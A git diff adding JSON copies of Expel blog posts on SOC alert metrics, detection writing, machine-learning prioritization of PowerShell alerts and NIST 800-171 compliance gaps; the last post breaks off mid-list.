basic seasonal decompose can be achieved with just a couple lines of code: Seasonal_decompose function from statsmodels.tsa.seasonal And here\u2019s the resulting visual: Output of `result.plot()` Now our time series data is split into the trend, seasonality and residuals. This allows us to answer key operational questions that we\u2019ll cover next! Metric #2: What\u2019s the daily alert trend? Technique: Trend analysis Tool: Tableau (or any visualization tool) TL;DR: You can use what happened in the past to predict what will happen in the future. And what goes up doesn\u2019t always come down unless we take action. We examine the daily alert trend to manage our alerts so they don\u2019t manage us. Jon\u2019s perspective: One of the most important questions SOC leaders should ask is: What\u2019s the daily alert trend? Is the trend going up, going down, is it steady or do we see transient spikes? Your answer to this question will determine if and how you need to spring into action. Recall from above, we use the seasonal_decompose function from the Python statsmodels.tsa.seasonal library to split our daily alert counts into three pieces: Trend Seasonality; and Residuals aka \u201cthe leftovers\u201d We do this via Jupyter Notebook to make it easy and export the results to a CSV that looks like this: CSV output of Time Series decomposition We then use a visualization tool, Tableau in this case, to examine the daily alert trend. Here\u2019s what that looks like: Daily alert trend visualization Let\u2019s talk about what\u2019s going on here. Between July 2020 and August 2020 we experienced a slight downward trend, but the trend was relatively stable. When we see something like this we take the action to make sure we weren\u2019t over tuning and perhaps even be a bit more aggressive with detection experiments. In the middle of August 2020 we see a couple big spikes mostly the result of a bad signature (it happens!) followed by a quick recovery to daily alert levels seen previously. Our call to action was to tune out the noise from the bad signatures. In the middle of September 2020 things get interesting. We see an upward trend that looks like a slow and steady climb. A pattern that looks like this always grabs my attention. This is very different from a big spike! Why? A slow and steady climb is likely indicative of more and more alerts showing up each day from different technologies. More alerts + increased variety = heavy cognitive loading And just like alerts, you have to manage cognitive loading. Because if you don\u2019t, well, SOC burnout has entered the chat. The call to action here is to understand the situation, figure out where the increased loading is coming from (new signature, product updates, etc.) and react. In this case two of the vendors we work with released product updates and we needed to tweak our detection rules to reduce false positive alerts. In late September 2020, you\u2019ll see a recovery to alert levels we\u2019ve previously seen. This is exactly what we\u2019re looking for! Pro-tip: You can ask the team \u201chow\u2019s it going?\u201d in weekly staff meetings or 1:1s , but I\u2019ve found that by guiding the conversation using data, you\u2019ll get better answers. For example, you can instead ask: Team, the daily alert trend is on a slow and steady climb right now. As a management team we\u2019re digging in, but what are you seeing? Lead with data. It let\u2019s the team know you understand what\u2019s happening and that you have their backs. In fact, it enables you to ask better questions which will lead to more effective answers. Hence why I say that metrics help you take care of the team. Metric #3: Is alert management under control? Technique: Statistical process control Tool: Shewhart control chart and any visualization tool TL;DR: Alert spikes are going to happen. But too many spikes can make it hard for a SOC analyst to find the alerts that matter. \u201cI only want to handle tons of false positives. Finding bad guys isn\u2019t interesting\u201d. \u2013 No SOC Analyst ever. An alert management process in a state of chaos means your SOC analysts are likely feeling the burn. Jon\u2019s perspective: If you\u2019ve spent time in a SOC, you know that bad signatures happen. You also know that experiments to answer \u201chow prevalent is this string or packet globally\u201d can sometimes lead to bad outcomes. And by a bad outcome, I mean tens of thousands or, in extreme cases, hundreds of thousands of false positive alerts. Again, it happens. Which is why effective managers ask: Is alert management in a state of control? To answer this question we use the residuals from our time series decomposition and a Shewhart control chart . Recall that residuals are what we have remaining after we\u2019ve extracted the trend and seasonal components. If you\u2019re unfamiliar with a Shewhart control chart here\u2019s a quick TL;DR: It\u2019s used to understand if a process is in a state of control. There\u2019s an upper control limit (UCL) and lower control limit (LCL) \u2013 we use three standard deviations from the mean. Measurements are plotted on the chart vs. a timeline. Measurements that fall above the UCL or below the LCL are considered to be out of control. Pro-tip: For folks just getting started with statistical process control, \u201c Statistical Process Control for Managers \u201d by Victor Sower is a great place to start. Armed with our residuals, we plot them in a Shewhart control chart using Tableau. Here\u2019s the resulting visualization: Shewhart control chart using alert residuals You might be wondering; what are we looking for? Well for starters, I\u2019m looking for any days where our measurements exceeded the UCL or LCL. From the visualization above you can see there were two days in August 2020 when alert management was \u201cout of control\u201d. On both days we encountered new vendor signatures that resulted in a high volume of false positives. But you can also see we were able to quickly get the situation under control. I also look for periods of time where there\u2019s more variance \u2013 and when I see more variance in our control chart that\u2019s almost always paired with a slow and steady upward trend. By plotting the residuals in a control chart we\u2019re able to answer \u201cis alert management under control\u201d and if not, we can figure out why and react. If we\u2019re seeing more variance, we do the same thing! We dig in, ask questions and adjust. We like to call this the \u201csmoothed out trend.\u201d And we do this again and again and again. Effective operations management is a process, there is no end state! Monitor, interpret, react, adjust. Rinse, repeat. Remember the \u201cWhy\u201d Super quick recap, promise. We started by performing Change-Point analysis against our aggregated daily alert count. Change-Point analysis let\u2019s us know the daily mean, if it changed and when. We then broke our aggregated daily alert counts into three pieces using time series decomposition: 1) trend 2) seasonality and 3) residuals. We then examined the \u201csmoothed out\u201d trend using a visualization tool to understand what\u2019s happening and then plotted the residuals in a Shewhart control chart to answer \u201cis alert management under control?\u201d Alert operations management process Remember the \u201cwhy\u201d with metrics. Metrics aren\u2019t just for status reports. Highly effective SOC leaders embrace data and use metrics to take care of the team. Again \u2013 if you\u2019re not managing your alerts, they\u2019re managing you. If you\u2019re not using data to spot too much cognitive loading \u2013 or finding ways to free up mental capacity \u2013 that\u2019s a recipe ripe for SOC burnout. And lastly, the quality of your operations management is rooted in the quality of the questions asked. Think about the questions you\u2019re asking today. Are they the right ones? We\u2019ve talked about metrics; how they create an efficient SOC and how they keep our analysts and customers happy. In our last post, we\u2019ll share some IRL examples of what this looks like within the Expel SOC. Don\u2019t miss it! Subscribe to our EXE blog now and be the first to read our third and final installment of our SOC metrics and leadership series." +} \ No newline at end of file diff --git a/performance-metrics-part-3-success-stories.json b/performance-metrics-part-3-success-stories.json new file mode 100644 index 0000000000000000000000000000000000000000..20cb93f432dfa03e9e007bf195afbdfe7c1dc787 --- /dev/null +++ b/performance-metrics-part-3-success-stories.json @@ -0,0 +1,6 @@ +{ + "title": "Performance metrics, part 3: Success stories", + "url": "https://expel.com/blog/performance-metrics-part-3-success-stories/", + "date": "May 18, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Performance metrics, part 3: Success stories Security operations \u00b7 6 MIN READ \u00b7 MATT PETERS, JON HENCINSKI AND ELISABETH WEBER \u00b7 MAY 18, 2021 \u00b7 TAGS: MDR / Metrics / Tech tools In this final post of our three-part blog series on all things SOC metrics and leadership, we\u2019re going to take the framework we described in the previous posts and share how we applied it in some specific situations. We\u2019ll point out a few gotchas and lessons learned along the way. Success story #1: The duplicate alert issue Metric: How many alerts do we move to an open investigation or incident? TL;DR: Finding improvements is often the combination of a set of metrics and the analysis to understand what those metrics mean. As we mentioned in part 1 of the series , one of our strategic goals is to understand our analysts\u2019 capacity and make sure we\u2019re making good use of it. Which means we need to understand what our analysts are doing . There are a bunch of ways to measure this, but since we were after understanding it as a process, we measured the various paths an alert can take through our system, and how long each alert spent in each state of our alert system. Understanding which stages an alert needs a human to get involved can give us an idea of where to focus our optimization energy. So, we added counters and timestamps to measure the path of each alert we processed. The diagram below shows our state machine, and the number of times alerts travel down each path. The data showed us that the number of alerts that were added to existing investigations accounted for 20-25 percent of all the alerts we handled. Expel SOC alert system diagram Now that we have measurements, we have to ask ourselves \u2013 what are they telling us? The data suggested that, while our analysts were investigating something, another alert related to the same behavior would come in. We\u2019ve all been there \u2013 you go heads down and ignore the queue for a few minutes only to pop up again and realize there are 10 more beacons or the network tech is now reporting what the endpoint saw. So the metrics were explainable, and it turned out this was having an impact \u2013 it happened a lot, which was adding up to wasted time. From here, we formulated our reaction. In this case our analysts and our UX team worked together to add a feature to our platform to automatically route related alerts to the appropriate investigation. As part of this process we added configuration to allow the analysts to widen or narrow the alert routing filter, based on what they thought \u201crelated\u201d alerts might be. We deployed these changes into production and watched what the impact was on the SOC. The graph below shows the change interval: Expel alert pathways before and after adding new UX tot auto add an alert to an investigation What we see is that we\u2019ve managed to cut the number of add-tos by 12 percent. Considering that typical triage time is four minutes, this translates to 12 percent x number of Expel alerts x four minute savings per week for our analysts. Success story #2: So much BEC Metric: How many business email compromise (BEC) incidents do we handle each week and what\u2019s the cycle time? TL;DR: You can simultaneously improve two metrics that are in tension with each other \u2013 like speed and quality \u2013 but you have to be creative to do it. In addition to understanding capacity, another goal is to respond faster than delivery pizza arrives at your door (30 minutes or less). One way we can do that is to stand on the SOC floor and shout: \u201cMove Faster!!!\u201d We\u2019ve all worked there, and it wasn\u2019t good for morale or for quality. We elected to follow a different path. By understanding what type of work was taking the longest and happening the most, we figured we might be able to get crafty and improve performance while keeping quality high. As a general rule, we look at (a) the things we do a lot and (b) the things that take a long time. To figure out where to target our efforts, we used gross counts of incident types \u2013 the theory being that incidents take longer to investigate and report. In this story, our SOC observed that, week-over-week, BEC was one of our most common incident types, making up about 60 percent of the incidents we handle. This looked like a prime place to optimize. From here, we asked the question: What about this process is taking the longest? To find the answer, we used a set of path metrics \u2013 each step in each alert is timestamped. By aggregating these timestamps, we learned that reporting was the most time consuming portion of the incident handling, taking over 30 percent of the total incident time. Step in process Typical cycle time (excludes wait time) Triage alert(s) for BEC attempt 3-4 minutes Move to investigation Seconds Preliminary scoping 5-8 minutes Declare incident Seconds Add remediation steps 1-2 minutes Secondary scoping 15-20 minutes Complete summary of \u201cFindings\u201d 20-25 minutes Typical BEC cycle time pre automation This is where things get challenging \u2013 blindly optimizing the reporting could lead to a massive drop in quality. The report, after all, is the thing that tells the org what to do in response. A bad job here and we might as well hang it up. Once again, the combination of Expel\u2019s UX team and the SOC proved to be magical \u2013 they designed an enhanced report including graphics and charts that was both more useful to the customer, as well as more automatable. The speed and quality of our reporting went up! In the table below you can see we improved our BEC incident cycle times by about 34 percent AND the quality of our reporting. Step in process Typical cycle time (excludes wait time) Pre-report automation With report automation Triage alert(s) for BEC attempt 3-4 minutes No change Move to investigation Seconds No change Preliminary scoping 5-8 minutes No change Declare incident Seconds No change Add remediation steps 1-2 minutes No change Secondary scoping 15-20 minutes No change Complete summary of \u201cFindings\u201d 20-25 minutes 5 minutes (-34%) BEC cycle time by step pre and post reporting automation Success story #3: Handing off work to the bots Metric: What classes of work do we see week-over-week? Are the steps well defined? Can we automate the work entirely to free up cognitive loading? TL;DR: Metrics can help you target automation to yield defined benefits in short time periods, rather than trying to generically automate \u201canalysis,\u201d which is a bit like solving the halting problem. We\u2019re constantly looking for ways to remove cumbersome work from humans \u2013 allowing them to focus on the more creative aspects of the job. But first we need to understand what classes of work we\u2019re doing and then figure out what can be automated. To answer these questions, we collect two sets of metrics: Counts of the number of each type of alert we receive Count of each type of action we perform in response to those alerts For example, we get 27 malware alerts per week, and our investigative process involves acquiring a file and detonating it 85 percent of the time. To be clear \u2013 gathering this data was a process rather than a discrete event. We continuously collected metrics to understand the types of actions we were performing along with the classes of alerts we were responding to. Turns out both of these metrics followed a Pareto distribution \u2013 we saw that 85 percent or more of the work was being spent on one or two top talkers: 1) suspicious logins and 2) suspicious file and process activity. To automate investigations into suspicious logins ,we started by understanding how often suspicious login alerts were moved to an investigation. Turns out, a lot. Then we studied which investigative steps our analysts were taking and then handed off the repetitive tasks to the robots. The full details can be found here , but the net result is that we improved the median investigation cycle time into suspicious logins by 75 percent! We then repeated this process by automating our investigation into suspicious file and process events, which was also Pareto distributed. At a certain point, we got down to things that we\u2019re not doing often enough to worry about. That\u2019s when we realized the development and maintenance cost exceeded the time and frustration savings. This is an ongoing effort. So far, it helps our analysts in 95 percent of our alert triage in any given week. That\u2019s a wrap! We hope you\u2019ve enjoyed reading this three-part SOC metrics blog series . Before you go off and create metrics for your SOC\u2019s performance, remember: Have a goal in mind before measuring all the things. A clear outcome will inform what to optimize. Leadership is the key to SOC efficiency \u2013 use metrics data to find ways to take care of your team and avoid burnout. Developing metrics doesn\u2019t mean just plugging in numbers for reports. Applying your measurement framework will be unique for each situation \u2013 it\u2019ll require a curious mind, a keen eye and a willingness to always find new ways to improve the process. There\u2019s no more strategic thing than defining where you want to get to and measuring it. Strategy informs what \u201cgood\u201d means and measurements tell you if you\u2019re there or not. Lastly, performing quality control (QC) is vital to your continued success. Check out our Expel SOC QC spreadsheet to see what our analysts look for when assessing performance. As an added bonus, you can get your own copy of this resource. So go ahead and download it (free of charge!) and customize it to fit your org\u2019s needs. Stay tuned \u2013 we\u2019ll be talking more about measuring SOC quality in a blog post coming soon! Download Expel SOC QC template" +} \ No newline at end of file diff --git a/plotting-booby-traps-like-in-home-alone-our-approach-to.json b/plotting-booby-traps-like-in-home-alone-our-approach-to.json new file mode 100644 index 0000000000000000000000000000000000000000..32edbe5be99a580135c6af8bef314064691dbf87 --- /dev/null +++ b/plotting-booby-traps-like-in-home-alone-our-approach-to.json @@ -0,0 +1,6 @@ +{ + "title": "Plotting booby traps like in Home Alone: Our approach to ...", + "url": "https://expel.com/blog/approach-to-detection-writing/", + "date": "Jan 12, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Plotting booby traps like in Home Alone: Our approach to detection writing Engineering \u00b7 7 MIN READ \u00b7 MATTHEW HOSBURGH \u00b7 JAN 12, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools We\u2019re often asked about how we create and prioritize detection at Expel. With so many factors to consider, it\u2019s difficult to give a one-size-fits-all response. We recently hosted an internal conference at Expel that included a detection writing lab to address this very question. The lab resulted in an analogy that I trust most of you reading this can relate to: How D&R engineers are like Kevin from Home Alone. By the time you finish reading this post you\u2019ll have an understanding of our thought process when it comes to writing detections at Expel, how detection writing enables our SOC analysts to make smart decisions as they review an alert and how this process helps us gain a deeper understanding of our customers\u2019 environments. Detection while Home Alone The most painful booby trap in Home Alone has got to be the nail through the foot as Marv walks barefoot up those tar smeared steps . Or possibly, when Harry grabs the glowing red-hot doorknob . You can almost smell his pain. But rewind a few days before the Wet Bandits are running through Kevin McCallister\u2019s \u201cfun house\u201d and you can see some of the planning that went into this burglary. The Wet Bandits did their research and profiling before making their move. They knew who was on vacation and even when the timer for the lights would kick-on each night. The difference between the McCallister home and those neighbors who were on vacation is that Kevin was able to identify the Wet Bandit\u2019s objectives early and counter their plan with a battle plan of his own. Throughout the well-loved movie, we\u2019re presented with a master class on how to identify nefarious threat activity at the expense of some of the sharpest burglars that Hollywood ever produced. Suffice it to say, you\u2019ve probably had your fill of holiday movies (or maybe not), but they can serve as a point of reference for what we do at Expel in terms of detection writing. You see, a detection is simply the identification of something interesting on your systems or network. But where it starts to get complicated is when you ask the question: Is this bad? To help orient your detection writing, it\u2018s important to consider risk. \u201cBut I thought risk was just for compliance activities?\u201d Well, understanding risk can serve you well in terms of threat detection and perhaps prioritizing your defenses. What is detection anyway? As noted previously, detection is basically identifying events of interest within your environment. But it goes beyond that. Detection is all about uncovering something that would otherwise remain hidden (or unchecked). Dragos has done a great job distilling the different categories into four major types that I can summarize into the following: Indicator Matching (IPs, file hashes, domains) Behavioral Matching (techniques, combinations of indicators) Configuration (exposed Amazon Web Services [AWS]S3 buckets, incorrectly configured authentication) Manual Efforts (threat hunting and threat modeling, for example) In many environments, there are algorithms or baselines that help to detect things outside of the norm. These are useful in the Expel context as they help us answer questions like: Has this logon exhibited this type of behavior in the past, or is this an outlier? Having an idea of where to start your Detection Quest may rest in a familiar (or painful) practice. Compliance equals security\u2026 (\u256f\u00b0\u25a1\u00b0)\u256f\ufe35 \u253b\u2501\u253b Risk isn\u2019t just for compliance, Marv! In the context of detection, it helps to serve as the guiding light to where we as security practitioners should start (or spend extra time). Why? Because risk represents the sum of threat (which could be an active adversary, opportunistic attacker or malware) and vulnerability (a hole in the fence \u2013 or system, network or cloud environment). Risk informed threat detection When Kevin first overhears the Wet Bandits talking about their plan to rob his home, he\u2019s actually conducting an ad hoc risk approach to threat detection: Threat = burglars eyeing his home (Wet Bandits) Vulnerability = Unlocked doors and/or no one home (no alarm, just light timers) Risk = likelihood the threat will take advantage of the vulnerability (imminent!) By examining your vulnerabilities and threats, you can have a better understanding of your organization\u2019s risk. Understanding your known risks and vulnerabilities, you\u2019ll have a greater chance of uncovering the threats that mean something to your organization. Put another way: your ability to create a meaningful detection will be more fruitful. The battle plan Kevin\u2019s rapid assessment requires immediate action: The battle plan . Adding up the known threat and known vulnerabilities, Kevin creates the overall strategy and tactical responses that will help to slow the Wet Bandits down. Similarly, this plan is like your unique organization\u2019s environment, which may incorporate your security tooling, identity providers and your cloud-based infrastructure. Similar to a clever eight-year-old\u2019s battle plan, detection writing requires planning Your battle plan will more than likely have more detail, but largely it serves as a means to understand the areas of your organization that you can obtain data from. This data can be used as the basis for your alerting. Alert data flow and where to start The result of your detection is an alert. An alert is really another way of saying detection (for sake of simple argument), but the key to getting to this point is bringing the relevant log data from the various sources identified in your organization\u2019s battle plan. Notice: I did not say bring in all the data either. Unless you have money to burn, having every log known to your organization is often unreasonable from a cost and storage perspective. Working your way back from your organization\u2019s most notable risks and most important data, you\u2019re able to more effectively prioritize the logs you need. This is often referred to as The Crown Jewel Analysis . The next step is to establish which logs will help make up the most complete picture as it relates to these systems and data. The second step is to understand who your adversary is. Take a breath. This could mean you might need to do some threat modeling . But the key is to understand what your adversary wants from their target (like protected client data, trade secrets or financials). Your threats don\u2019t care how much you\u2019ve spent on your security; they\u2019re more interested in if they\u2019ll be successful in achieving their objectives and if they\u2019ll be caught. The best way to consider this is via a model coined by Josh Corman and David Etue which is known as the Adversary Return on Investment (AROI). Adversary\u2019s Return on Investment (AROI) formula More notional than quantitative, this model helps you understand why your organization might be a target for a particular adversary. Decreasing the adversary\u2019s probability of success via deterrence measures can increase their chances of being caught. This can mean you\u2019re a less appealing target because the return isn\u2019t optimal. With this established, it\u2019s time to create your detection! A rule At Expel, we\u2019re fans of Yet Another Markup Language (YAML). It gives us detection writers the ability to describe what we\u2019re detecting and the detection\u2019s priority, categorization and required investigative steps. Beyond that, it\u2019s the file we use to write our detection logic in \u2013 which you see in the image below. Example YAML Snippet from Expel\u2019s Sunburst IOC Detection The result of the logic often results in an Expel alert, which is what our SOC analysts use to make decisions. Remember when Kevin would celebrate when his adversary (the Wet Bandits) would have their face smashed by an iron or their head torched? Similarly, we celebrate when we find something \u2013 but it doesn\u2019t stop there. Often an alert may require enrichment or additional details. These details may come directly from the rule itself or they may be provided by our automation robots. There\u2019s no better way to burn out a SOC analyst than by having them lookup domain information for hundreds of alerts per day. Instead, we pass most of the enrichment activities to our robots so our analysts have the most relevant information to make an expeditious decision, which keeps them in the proper mindset. Investigative mindset The Expel mindset is all about making a decision based on an alert, or multiple alerts, with minimal manual effort. Our detection writing and response actions are centered around this. Some of the common questions an analyst needs to answer in order to determine next steps (Is this an incident? Does the customer need to be notified? Do I need more information?) are dependent on the following: What am I looking at? Can I use open source tools, or is the information returned from our automation to identify suspicious behavior? If the alert is benign, should I suppress it? Do I need to investigate the activity further? Spotting the trends Spoiler alert: At the end of Home Alone, just when you think the Wet Bandits are about to claim their vengeance against little Kevin, Old Man Marley steps in to serve up his infamous shovel to the head. Unbenounced to the Wet Bandits is that the police are on their way. Once apprehended, the officer states that they now know each and every house they hit because their indicator of compromise (IOC) was running water. At Expel, we monitor and respond to alerts from a variety of customers across industries. Our analysts are at the center of all the action and have the ability to analyze trends over multiple customers, which aids them in the decision making process. A word about communication Effective communication with the customer is paramount. At the point when the determination is made that the alert does constitute an incident, an analyst would quickly assign the necessary remediation actions to put a stop to an active threat. They would also recommend the required resilience actions to prevent similar threats to the customer\u2019s environment in the future. In certain cases where the threat is ongoing, analysts will arm themselves by creating a Be On the LookOut (BOLO) rule for an indicator, or a collection of indicators to quickly create a custom detection to alert on future malicious activity. Finally, analysts may also add certain indicators to the customer context also known as the customer context (CCTX) database to quickly pass information among themselves and to help them further understand each customer\u2019s unique environment. All of this is key to detection and response at Expel. Parting words We hope this post has given you insight into how we write detections here at Expel in a more approachable manner. Detection is simply the process of spotting interesting activity on a system or network. Where it truly proves to be valuable is when the alert can help a human make a decision about the bad-ness of what they\u2019re looking at. Similar to the way Kevin kept himself safe in Home Alone, a lot of consideration goes into creating a detection. It takes analysis of risk, vulnerabilities and the relevant threats to the organization. Because not all threats or adversaries are created equal, it\u2019s important to present detailed information, with minimal manual intervention, to the analyst so they can make a determination on next steps. Finally, communication \u2013 just like how Kevin reported the Wet Bandits to the authorities \u2013 is an important step in response. You guys give up? Or are you thirsty for more?\u201d \u2013 Kevin McCallister" +} \ No newline at end of file diff --git a/prioritizing-suspicious-powershell-activity-with-machine.json b/prioritizing-suspicious-powershell-activity-with-machine.json new file mode 100644 index 0000000000000000000000000000000000000000..24cc290027941599aef259c5256952d44a1366bf --- /dev/null +++ b/prioritizing-suspicious-powershell-activity-with-machine.json @@ -0,0 +1,6 @@ +{ + "title": "Prioritizing suspicious PowerShell activity with machine ...", + "url": "https://expel.com/blog/prioritizing-suspicious-powershell-activity-with-machine-learning/", + "date": "Jul 21, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Prioritizing suspicious PowerShell activity with machine learning Tips \u00b7 6 MIN READ \u00b7 ELISABETH WEBER \u00b7 JUL 21, 2020 \u00b7 TAGS: Get technical / How to / Managed detection and response / Managed security / SOC PowerShell in a nutshell: It\u2019s a legitimate, management framework tool used for system administration but is commonly used by attackers looking to \u201clive off the land\u201d ( LOL ) because of its availability and extensibility across Windows machines. So, why are we talking about PowerShell specifically? PowerShell historically is a go-to tool for attackers because it\u2019s a scripting language that is easily extensible and exists by default on most Window\u2019s machines. It\u2019s also commonly used by administrators. Which is why differentiating between administrative activity and malicious PowerShell use is important. This is where I came in. (*waves* Hi! I\u2019m Expel\u2019s senior data scientist.) In this blog post, I\u2019ll talk about how I used machine learning in combination with the expertise of our SOC analysts to make it easier and faster for them to triage PowerShell alerts. Incoming First, I\u2019d like to set the stage. Expel is a technology company that has built a SaaS platform (Expel Workbench) to enable our 24\u00d77 MDR (managed detection and response) service. We integrate directly with the APIs of our more than 45+ different security vendors, 12 of which are EDRs (endpoint detection and response). We pull alerts from these devices, normalize them to an Expel specific format and process them through a detection engine we lovingly call Josie. Alerts then show up in the Expel Workbench with an Expel assigned severity. Getting our priorities straight Before you get to triaging, you\u2019ve got to figure out a way to know when it\u2019s the right time to sound the alarm. Each severity is in its own queue. Analysts work from critical to low, or visually you can think about this as working from left to right. A critical alert, for example, has an SLO (service-level objective) of an analyst picking it up within five minutes of it arriving in the queue. We can use these queues, shuffling alerts based on our confidence, to react quicker to higher confidence alerts. Alerts that fall into the high queue are triaged by our analysts first. Then they look at medium alerts, followed by low-priority alerts. Using this queueing method helps to ensure that the most urgent alerts are viewed by analysts first. Seems simple, right? Well, figuring out where an alert falls in this queue is the tricky part. Typically, we make this determination by looking at an entire class of alerts and assigning a priority level to that entire class. For example, based on our experience with vendor Y we map alert category X to Expel severity Q. This is an example of us mapping a whole category of alerts to a specific Expel severity. However, for PowerShell alerts, we now use a machine learning model to predict the likelihood that each individual PowerShell alert is malicious. Based on that prediction, we determine under which level of priority to place the alert in the queue. For example, if we predict that an incoming PowerShell alert has an 95 percent likelihood of being malicious, this alert would be placed in the high priority queue ensuring that analysts quickly investigate it. This way, our SOC team can quickly respond to threats in our customers environments. Wait\u2026predicting the percentage likelihood of an alert being malicious? It\u2019s not sorcery, I promise. It\u2019s math. To determine the likelihood that a PowerShell alert is malicious, we use a decision tree based classification model with several different features. It\u2019s trained on past alerts that our SOC analysts have triaged. All decisions that our analysts make about an alert are recorded in Expel Workbench. The decision points, like moving an alert to investigation, closing it as a false positive or declaring it true positive and moving to an incident, serve as ground truth labels that we can use when building our classification model. You\u2019ll see an example of a machine learning decision tree below. Our model features are extracted from the PowerShell process arguments. Based on those features the model essentially makes a series of decisions until it reaches a conclusion as to whether or not the activity is malicious. Example decision tree After the alert\u2019s process arguments go through all the decision points, we\u2019re able to predict the likelihood that the alert is malicious. While this example is much more simplified than Expel\u2019s actual decision trees, this shows you the basic process for how the model is applied to make decisions. The model we created at Expel to help us prioritize PowerShell alerts uses LightGBM which basically combines several decision trees (similar to the one above). They\u2019re all slightly different but cumulatively create greater efficiency in determining how likely an argument (alert) is to be malicious. Our model uses more than 30 different features. Here\u2019s an example of a few: Entropy of the process argument Other count variables: these count the number of times special characters like +, @, $ and more are found in the process arguments Other string indicator variables to check if specific strings, like \u201cinvoke\u201d or \u201c-enc\u201d/\u201c-ec\u201d/\u201c-e\u201d, are present in the process arguments What does this look like at Expel? Who\u2019s on the front line of defense? You guessed it \u2013 our robots . Our analysts are supported by technology we\u2019ve built at Expel. In the case of triage, we\u2019re constantly adding new automated tasks. We think of each task as a robot with a specific job. So, it shouldn\u2019t come as a surprise that we\u2019ve also implemented the classification task of PowerShell in a robot. When an alert comes in, our robots check if it contains a PowerShell process (yes \u2013 we\u2019re fully aware you can bypass this by renaming PowerShell). If so, the robot runs the PowerShell arguments through the classification model to get a prediction. Once the robot has the prediction, it reprioritizes the alert if necessary and includes a note on the alert to let our analysts know that the alert was reprioritized. It is very important to note that this robot will never suppress an alert, they can only change the severity. The process looks like this: PowerShell model process Let\u2019s look at an example of an alert going through the process. Below, you\u2019ll see an alert came in and is now being assessed as a PowerShell activity. First, the robot checks if the PowerShell process is present, and if so it runs those process arguments through the PowerShell model. The image below shows an example of process arguments that would get pushed through this model. Example of a process args After the arguments run through the model, we get a score of how likely it is that the arguments are malicious. If that score is above a defined threshold, we reprioritize the alert to a higher point in the queue. And finally, if an alert is reprioritized, our analysts will see a note in Expel Workbench (see example below). Analyst view in Expel Workbench after alert is reprioritized The analyst will still triage the alert as normal, they\u2019ll just be doing it sooner. The example we just walked through was actually an incident that our analysts caught sooner because we moved the initial alert from low to high in our queue. Three things we learned after productionalizing our first machine learning model: This was a collaborative effort, and our integration with not only Expel\u2019s internal teams but also with our stakeholders helped us come away with some key insights. As you consider applying machine learning, here are a few things at Expel we learned/believe. 1. Have a way to monitor the model in production. Keep a line of sight on the model\u2019s performance once implemented. Track metrics like the count of alerts that were evaluated by the model as well as how many of those alerts were actually reprioritized. We also continue to monitor how well the model identifies truly malicious alerts assessing how many high priority alerts turn out to be malicious activity. We use DataDog to monitor our applications so we\u2019ve bent it to our will and use it to monitor this model\u2019s performance. I\u2019ve provided an example of our dashboard in the image below, which shows the past month of PowerShell activity. Example image of Expel Workbench 2. Run machine learning in parallel with human eyes to build trust. Machine learning techniques can sometimes feel like a black box. Because of this, it\u2019s important to overcommunicate what you are doing and also make it clear the technology is a way of supplementing human work rather than replacing human work. Overcommunication, and stakeholder buy-in, helps us enhance the feedback loop with our stakeholders. This builds trust and increases feedback, which inevitably improves the overall performance of the model over time. 3. Have a way for users to provide feedback. Since our analysts are working with these alerts every day, they\u2019re able to provide great long-term feedback on the model results in production. If an alert gets moved up in priority when an analyst doesn\u2019t think it should have, this provides an opportunity for them to give us that feedback so we can think about potential future improvements to the model. For example, could we add a new feature that would help with the use case they are questioning? It\u2019s important to continue asking these questions and maintain an open line of communication across teams. Striking a balance between automation and human judgement is key to security operations. This is just one example of how we use automation here at Expel. Want to find out more about how we help our customers spot malicious attacks in PowerShell? Send us a note!" +} \ No newline at end of file diff --git a/reaching-all-the-way-to-your-nist-800-171-compliance.json b/reaching-all-the-way-to-your-nist-800-171-compliance.json new file mode 100644 index 0000000000000000000000000000000000000000..f2c7de01704586d50a469ad0a2651c7e37646e1f --- /dev/null +++ b/reaching-all-the-way-to-your-nist-800-171-compliance.json @@ -0,0 +1,6 @@ +{ + "title": "Reaching (all the way to) your NIST 800-171 compliance ...", + "url": "https://expel.com/blog/reaching-nist-800-171-compliance-goals/", + "date": "Nov 29, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Reaching (all the way to) your NIST 800-171 compliance goals Security operations \u00b7 5 MIN READ \u00b7 BRUCE POTTER \u00b7 NOV 29, 2018 \u00b7 TAGS: Managed security / NIST / Overview / Planning / SOC If you\u2019re a U.S. Department of Defense (DoD) contractor or you do work with GSA or NASA, you\u2019re likely pretty familiar with NIST 800-171. If you\u2019re not a contractor subject to NIST 800-171, congrats, this is one security framework you DON\u2019T need to comply with. You can stop reading, grab a cup of coffee and focus on your NIST Cybersecurity Framework efforts instead. NIST 800-171 has technically been in force since the start of 2018. And while you had to be compliant at the beginning of the year, you\u2019re likely still looking to streamline your compliance and refine controls based on the evolving understanding of what NIST 800-171 means. You\u2019re not alone, NIST even had a workshop on what Controlled Unclassified Information (CUI) in October. Given that protecting CUI is at the core of NIST 800-171, it\u2019s safe to assume things will be dynamic for some time to come. A brief history of NIST 800-171 In a past life, I was the CISO for a DoD contractor. In particular, I was a CISO at a DoD contractor when the DFAR requirements were announced and we had to start preparing for compliance with NIST 800-171 by the end of 2017. I remember looking at 171 and thinking there were huge chunks of it that we, and most of our peers, had largely under control. Encryption requirements and other architectural security controls were well-traveled ground, and there were lots of vendors with well-tested products to close the compliance gap. But then there were other controls, particularly around monitoring and operations, that weren\u2019t easily solvable with off-the-shelf products. The Defense Industrial Base (DIB), in general, went through a cybersecurity revolution in the early 2010s, after they were hit with a wave of targeted attacks. But there was still a long way to go. Their technology investments needed a commensurate investment in services and people. That\u2019s easier said than done. If you\u2019ve ever worked in a professional services company (including defense contractors), you know how hard it is to hire people that can\u2019t bill their time back to customers. Think IT, legal, finance and \u2026 oh yeah \u2026 security. It\u2019d be easier to go climb Kilimanjaro to stand up a 24\u00d77 SOC (If you\u2019d like more info on setting up your own SOC, as well as the costs and challenges associated with it, check out our blog post, How much does it cost to build a 24\u00d77 SOC .) Understanding common NIST 800-171 compliance gaps Like it or not NIST 800-171 spells out a number of operational controls, which are hard to put in place without old-fashioned human beings. And you\u2019ve got to have these controls in place to get your compliance crown (and pass your audit with flying colors). Most of them relate to monitoring. They include: Procedure Security requirement 3.1.12 Monitor and control remote access sessions 3.3.3 Review and update logged events 3.3.5 Correlate audit record review, analysis, and reporting processes for investigation and response to indications of unlawful, unauthorized, suspicious, or unusual activity All of section 3.6 Incident response 3.14.3 Monitor system security alerts and advisories and take action in response 3.14.6 